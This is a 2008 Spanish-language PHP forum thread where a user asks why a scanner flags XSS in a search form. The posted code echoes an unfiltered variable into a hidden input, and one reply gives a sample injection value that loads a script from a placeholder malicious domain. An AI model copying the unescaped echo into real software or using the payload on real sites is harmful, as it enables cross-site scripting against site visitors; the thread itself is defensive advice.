Foros del Web » Programando para Internet » PHP »

ayuda seguridad en buscador

 Estas en el tema de ayuda seguridad en buscador en el foro de PHP en Foros del Web. hola gente bueno quiero preguntarles a los q saben si me analizan el buscador ya que un analizador me tira q existen bugs xss o ...
  #1 (permalink)  
Antiguo 29/07/2008, 22:29
 
Fecha de Ingreso: julio-2008
Mensajes: 20
Antigüedad: 15 años, 8 meses
Puntos: 0
Exclamación ayuda seguridad en buscador
hola gente bueno quiero preguntarles a los q saben si me analizan el buscador ya que un analizador me tira q existen bugs xss o algo asi .. :S

Código: 
<tr><td rowspan="2" valign="top"><tr> 
          <td width="146" bgcolor="#0161B8">&nbsp;</td>
          <td width="8" bgcolor="#3D7DBA">&nbsp;</td>
          <td width="41">&nbsp;</td>
        </tr>
        <tr> 
          <td colspan="3"><img src="archivos/b_buscador.jpg" width="155" height="29"></td>
        </tr>
        <tr> <form name="form1" method="post" action="index.php">
          <td height="97" colspan="3">
            <table width="79%" height="97"  border="0" cellpadding="0" cellspacing="0">
              <tr>
                <td height="97" background="archivos/buscador.jpg"><div align="center">
                    <table width="100%"  border="0" cellspacing="0" cellpadding="0">
                      <tr>
                        <td><div align="center">
                          <input name="key" type="text" id="key" style="background-color: #336699; font-size: 9 pt; color: #FFFFFF; letter-spacing: 1pt; border: 1 ; border-style: solid; border-color: #CCCCCC" size="16" font="verdana">                            
                          <br>
                            <table width="62%"  border="0" align="center" cellpadding="0" cellspacing="0">
                              <tr>
                                <td class="contentSmall-negrblanco"><div align="center" class="Estilo6">
                                    <div align="left">
                                      <input name="campo" type="radio" class="contentcentrado" value="nombre" checked>
                                      <span class="Estilo18">Nombre</span></div>
                                </div></td>
                              </tr>
                              <tr>
                                <td class="contentSmall-negrblanco"><div align="center" class="Estilo6">
                                    <div align="left">
                                      <input name="campo" type="radio" class="content" value="descripcion">
                                      <span class="Estilo18">Descripci&oacute;n</span> </div>
                                </div></td>
                              </tr>
                            </table>
                            <table width="100%"  border="0" cellspacing="0" cellpadding="0">
                            </table>
                        </div></td>
                      </tr>
                    </table>
                    <div align="right">
                      <input name="mod" type="hidden" id="mod" value="buscar">
                      <input name="id_so" type="hidden" id="id_so" value="<?php echo $id_so; ?>">
                      <INPUT TYPE="image" NAME="submit" src="archivos/buscar.jpg" width="32" height="12" border="0" alt="Submit">
            &nbsp;&nbsp;&nbsp; <br>
                    </div>
                </div></td>
              </tr>
            </table>
         </td>
         </form></tr>
espero que alguien sepa decirme cual es el error, aunq creo q es en las id pero no estoy seguro

gracias
Última edición por Zer0bg; 29/07/2008 a las 22:48
  #2 (permalink)  
Antiguo 29/07/2008, 23:10
Avatar de enlinea777  
Fecha de Ingreso: mayo-2008
Ubicación: frente al pc
Mensajes: 1.830
Antigüedad: 15 años, 10 meses
Puntos: 127
Pregunta Respuesta: ayuda seguridad en buscador
no estiendo la pregunta
  #3 (permalink)  
Antiguo 29/07/2008, 23:26
 
Fecha de Ingreso: julio-2008
Mensajes: 20
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: ayuda seguridad en buscador
claro es simple necesito saber si mi buscador tiene algun bug. alguna linea mal hecha que pueda probocar algun ataque o algun agujero en la web ya que un programa que analiza los codigos de una web me detector 34 fallos de seguridad en el buscador
  #4 (permalink)  
Antiguo 30/07/2008, 01:15
 
Fecha de Ingreso: octubre-2004
Mensajes: 2.627
Antigüedad: 19 años, 5 meses
Puntos: 48
Respuesta: ayuda seguridad en buscador
De tener algun bug, sera en el codigo que recibe ese formulario. O como mucho en
Código PHP:
<input name="id_so" type="hidden" id="id_so" value="<?php echo $id_so?>">
si $id_so es un valor que recibe la pagina de forma externa (GET, POST, COOKIE) y no es filtrada para evitar que pueda tener valores como 30"><script src="http://dominiodelosmalos/script_malo"></script
  #5 (permalink)  
Antiguo 30/07/2008, 02:41
Avatar de desendoll  
Fecha de Ingreso: mayo-2008
Mensajes: 340
Antigüedad: 15 años, 11 meses
Puntos: 3
Respuesta: ayuda seguridad en buscador
Un error de seguridad XSS ho bien será como dice DarkJ o en la posterior ejecución de los campos del formulario. Aun así no puede ser que los errores que te de sean de mala programación del html? te puedes ahorrar mas de 25 lineas en este formulario, revisa el código.

Que "analizador" utilizas?
__________________
Francesc Jimenez
  #6 (permalink)  
Antiguo 30/07/2008, 18:39
 
Fecha de Ingreso: julio-2008
Mensajes: 20
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: ayuda seguridad en buscador
hola gracias por contestar.... es que mucho no entiendo. que me recomendarian filtrar o cambiar para que el formulario sea mas seguro??
el analizador q uso se llama acunetix
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 18:22.